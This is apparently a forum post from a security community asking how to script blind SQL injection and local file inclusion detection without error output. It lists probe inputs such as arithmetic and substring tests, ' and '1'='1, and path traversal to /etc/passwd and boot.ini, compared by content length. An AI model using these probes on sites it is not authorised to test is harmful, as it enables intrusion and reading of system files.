Hi EZ Members
I'm have a quite good knowledge and some experience in sqli and lfi.
Yet I struggle to copy that into a script. The big Question is actually how to determine a vulnerability if there is no error output?
What is the fastest way?
I had a few thoughts...
about sqli without error output:
1. numeric input if id=7 is the same as id=8-1. there is a good chance for sqli
2. if site=home and site=substring('home',1,4) is the same there is also a good chance for sqli
about lfi without error output:
1. just try ../.. (...) ../etc/passwd and boot.ini and check for a difference in content length
so the scripts looks at a specific get/post field:
suppose I need '
1. generate query with ' at the end of the standard value ( if any )
2. search in the content for sql errors, php errors, other errors -> exit if yes
3. try something like ' and '1'='1 and see if you get same ouput then normal
??
I really don't know how to check this case
suppose I don't need '
4. if numeric try the subtraction (1.) and if not try the substring (2.) -> exit if content length is the same as normal input
and lfi:
5. try passwd and boot.ini and compare content length
6. not vuln or try some other stuff ..
